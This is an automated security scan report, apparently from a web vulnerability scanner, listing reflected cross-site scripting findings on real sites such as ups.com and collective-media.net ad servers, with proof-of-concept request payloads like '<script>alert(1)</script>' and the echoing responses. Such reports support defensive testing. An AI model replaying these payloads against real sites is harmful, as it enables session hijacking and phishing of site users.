1.325. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 3]

1.326. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 2]

1.327. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 3]

1.328. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 2]

1.329. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 3]

1.330. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 2]

1.331. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 3]

1.332. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 2]

1.333. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 3]

1.334. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 2]

1.335. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 3]

1.336. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 2]

1.337. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 3]

1.338. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 2]

1.339. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 3]

1.340. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 2]

1.341. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 3]

1.342. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 2]

1.343. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 3]

1.344. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 2]

1.345. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 3]

1.346. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 2]

1.347. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 3]

1.348. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 2]

1.349. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 3]

1.350. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 2]

1.351. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 3]

1.352. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 2]

1.353. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 3]

1.354. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 2]

1.355. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 3]

1.356. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 2]

1.357. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 3]

1.358. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 2]

1.359. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 3]

1.360. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 2]

1.361. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 3]

1.362. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 2]

1.363. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 3]

1.364. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 2]

1.365. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 3]

1.366. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 2]

1.367. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 3]

1.368. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 2]

1.369. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 3]

1.370. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 2]

1.371. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 3]

1.372. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 2]

1.373. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 3]

1.374. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 2]

1.375. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 3]

1.376. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 2]

1.377. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 3]

1.378. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 2]

1.379. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 3]

1.380. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 2]

1.381. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 3]

1.382. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 2]

1.383. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 3]

1.384. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 2]

1.385. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 3]

1.386. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 2]

1.387. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 3]

1.388. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 2]

1.389. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 3]

1.390. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 2]

1.391. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 3]

1.392. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 2]

1.393. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 3]

1.394. http://www.ups.com/dropoff [WT.svl parameter]

1.395. http://www.ups.com/dropoff [loc parameter]

1.396. http://www.ups.com/dropoff [name of an arbitrarily supplied request parameter]

1.397. https://www.ups.com/account/am/start [REST URL parameter 2]

1.398. https://www.ups.com/account/am/start [REST URL parameter 2]

1.399. https://www.ups.com/account/am/start [REST URL parameter 2]

1.400. https://www.ups.com/account/am/start [REST URL parameter 3]

1.401. https://www.ups.com/account/am/start [REST URL parameter 3]

1.402. https://www.ups.com/account/am/start [REST URL parameter 3]

1.403. https://www.ups.com/account/am/start [loc parameter]

1.404. https://www.ups.com/account/am/start [loc parameter]

1.405. https://www.ups.com/account/am/start [loc parameter]

1.406. https://www.ups.com/account/us/start [REST URL parameter 2]

1.407. https://www.ups.com/account/us/start [REST URL parameter 2]

1.408. https://www.ups.com/account/us/start [REST URL parameter 2]

1.409. https://www.ups.com/account/us/start [REST URL parameter 3]

1.410. https://www.ups.com/account/us/start [REST URL parameter 3]

1.411. https://www.ups.com/account/us/start [REST URL parameter 3]

1.412. https://www.ups.com/account/us/start [loc parameter]

1.413. https://www.ups.com/account/us/start [loc parameter]

1.414. https://www.ups.com/account/us/start [loc parameter]

1.415. https://www.ups.com/cva [REST URL parameter 1]

1.416. https://www.ups.com/cva [REST URL parameter 1]

1.417. https://www.ups.com/cva [REST URL parameter 1]

1.418. https://www.ups.com/cva [loc parameter]

1.419. https://www.ups.com/cva [loc parameter]

1.420. https://www.ups.com/cva [loc parameter]

1.421. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

1.422. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

1.423. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

1.424. https://www.ups.com/myWorkspace/home [loc parameter]

1.425. https://www.ups.com/myWorkspace/home [loc parameter]

1.426. https://www.ups.com/myWorkspace/home [loc parameter]

1.427. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

1.428. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

1.429. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

1.430. https://www.ups.com/myWorkspace/wspref [loc parameter]

1.431. https://www.ups.com/myWorkspace/wspref [loc parameter]

1.432. https://www.ups.com/myWorkspace/wspref [loc parameter]

1.433. https://www.ups.com/myups/addresses [REST URL parameter 2]

1.434. https://www.ups.com/myups/addresses [REST URL parameter 2]

1.435. https://www.ups.com/myups/addresses [REST URL parameter 2]

1.436. https://www.ups.com/myups/addresses [loc parameter]

1.437. https://www.ups.com/myups/addresses [loc parameter]

1.438. https://www.ups.com/myups/addresses [loc parameter]

1.439. https://www.ups.com/myups/forgotpassword [loc parameter]

1.440. https://www.ups.com/one-to-one/forgot [loc parameter]

1.441. https://www.ups.com/one-to-one/register [loc parameter]

1.442. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

1.443. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

1.444. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

1.445. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

1.446. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

1.447. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

1.448. https://www.ups.com/osa/orderSupplies [loc parameter]

1.449. https://www.ups.com/osa/orderSupplies [loc parameter]

1.450. https://www.ups.com/osa/orderSupplies [loc parameter]

1.451. https://www.ups.com/quantum_services/download [loc parameter]

1.452. https://www.ups.com/quantum_services/download [loc parameter]

1.453. https://www.ups.com/quantum_services/download [loc parameter]

1.454. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

1.455. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

1.456. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

1.457. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

1.458. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

1.459. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

1.460. https://www.ups.com/qvadmin/admin [loc parameter]

1.461. https://www.ups.com/qvadmin/admin [loc parameter]

1.462. https://www.ups.com/qvadmin/admin [loc parameter]

1.463. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

1.464. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

1.465. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

1.466. https://www.ups.com/sharp/prefapp [loc parameter]

1.467. https://www.ups.com/sharp/prefapp [loc parameter]

1.468. https://www.ups.com/sharp/prefapp [loc parameter]

1.469. https://www.ups.com/uis/create [REST URL parameter 1]

1.470. https://www.ups.com/uis/create [REST URL parameter 1]

1.471. https://www.ups.com/uis/create [REST URL parameter 1]

1.472. https://www.ups.com/uis/create [REST URL parameter 2]

1.473. https://www.ups.com/uis/create [REST URL parameter 2]

1.474. https://www.ups.com/uis/create [REST URL parameter 2]

1.475. https://www.ups.com/uis/create [loc parameter]

1.476. https://www.ups.com/uis/create [loc parameter]

1.477. https://www.ups.com/uis/create [loc parameter]

1.478. http://www.webbyawards.com/webbys/current_honorees.php [media_id parameter]

1.479. http://www.webbyawards.com/webbys/current_honorees.php [season parameter]

1.480. http://www.wikia.com/index.php [actionName parameter]

1.481. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

1.482. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

1.483. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

1.484. http://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header]

1.485. https://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header]

1.486. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

1.487. http://ar.voicefive.com/bmx3/broker.pli [ar_da39f516a098b3de) ar_p68511049 cookie]

1.488. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

1.489. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

1.490. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

1.491. http://ar.voicefive.com/bmx3/broker.pli [ar_p84053757 cookie]

1.492. http://ar.voicefive.com/bmx3/broker.pli [ar_p84068139 cookie]

1.493. http://ar.voicefive.com/bmx3/broker.pli [ar_p84532700 cookie]

1.494. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

1.495. http://ar.voicefive.com/bmx3/broker.pli [ar_p86183782 cookie]

1.496. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p84053757 cookie]

1.497. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

1.498. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]

1.499. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]

1.500. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [ZEDOIDA cookie]

1.501. http://ib.adnxs.com/acb [acb816623 cookie]

1.502. http://k.collective-media.net/cmadj/cm.dailymail/ron_052010 [cli cookie]

1.503. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [V cookie]

1.504. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [cwbh1 cookie]



1. Cross-site scripting (reflected)
There are 504 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.



1.1. http://a.collective-media.net/ad/cm.dailymail/ron_052010 [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a3b2a<script>alert(1)</script>2a020577f18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ada3b2a<script>alert(1)</script>2a020577f18/cm.dailymail/ron_052010;sz=300x250;ord=3461791? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; mmpg=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 113
Date: Mon, 14 Feb 2011 01:37:38 GMT
Connection: close
Vary: Accept-Encoding

unknown path /ada3b2a<script>alert(1)</script>2a020577f18/cm.dailymail/ron_052010;cmw=nurl;sz=300x250;ord=3461791

1.2. http://a.collective-media.net/ad/cm.drudgerep/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/cm.drudgerep/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 91f06<script>alert(1)</script>bbd480d1b59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad91f06<script>alert(1)</script>bbd480d1b59/cm.drudgerep/;sz=300x250;click0=;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 115
Date: Mon, 14 Feb 2011 02:10:23 GMT
Connection: close
Vary: Accept-Encoding

unknown path /ad91f06<script>alert(1)</script>bbd480d1b59/cm.drudgerep/;cmw=nurl;sz=300x250;click0=;ord=[timestamp]

1.3. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2dc11'-alert(1)-'c06cd63375f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.dailymail2dc11'-alert(1)-'c06cd63375f/ron_052010;sz=300x250;ord=3412338? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 448
Date: Mon, 14 Feb 2011 01:35:24 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 01:35:24 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.dailymail2dc11'-alert(1)-'c06cd63375f/ron_052010;sz=300x250;net=cm;ord=3412338;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.4. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6de2b'-alert(1)-'8f8feffd6d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.dailymail/ron_0520106de2b'-alert(1)-'8f8feffd6d6;sz=300x250;ord=3412338? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 448
Date: Mon, 14 Feb 2011 01:35:25 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 01:35:25 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.dailymail/ron_0520106de2b'-alert(1)-'8f8feffd6d6;sz=300x250;net=cm;ord=3412338;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.5. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.dailymail/ron_052010

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e360'-alert(1)-'b71794fc123 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.dailymail/ron_052010;sz=300x250;ord=3412338?&9e360'-alert(1)-'b71794fc123=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 452
Date: Mon, 14 Feb 2011 01:35:24 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 01:35:24 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.dailymail/ron_052010;sz=300x250;net=cm;ord=3412338?&9e360'-alert(1)-'b71794fc123=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.6. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.dailymail/ron_052010

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7086'-alert(1)-'ae7eaada4f3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.dailymail/ron_052010;sz=300x250;ord=3412338?d7086'-alert(1)-'ae7eaada4f3 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Date: Mon, 14 Feb 2011 01:35:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 01:35:23 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.dailymail/ron_052010;sz=300x250;net=cm;ord=3412338?d7086'-alert(1)-'ae7eaada4f3;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.7. http://a.collective-media.net/adj/cm.drudgerep/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.drudgerep/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22425'-alert(1)-'80a6204c2ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.drudgerep22425'-alert(1)-'80a6204c2ff/;sz=300x250;click0=;ord=$cacheBuster$ HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Mon, 14 Feb 2011 02:10:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 02:10:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.drudgerep22425'-alert(1)-'80a6204c2ff/;sz=300x250;net=cm;ord=$cacheBuster$;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.8. http://a.collective-media.net/adj/cm.drudgerep/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.drudgerep/

Issue detail

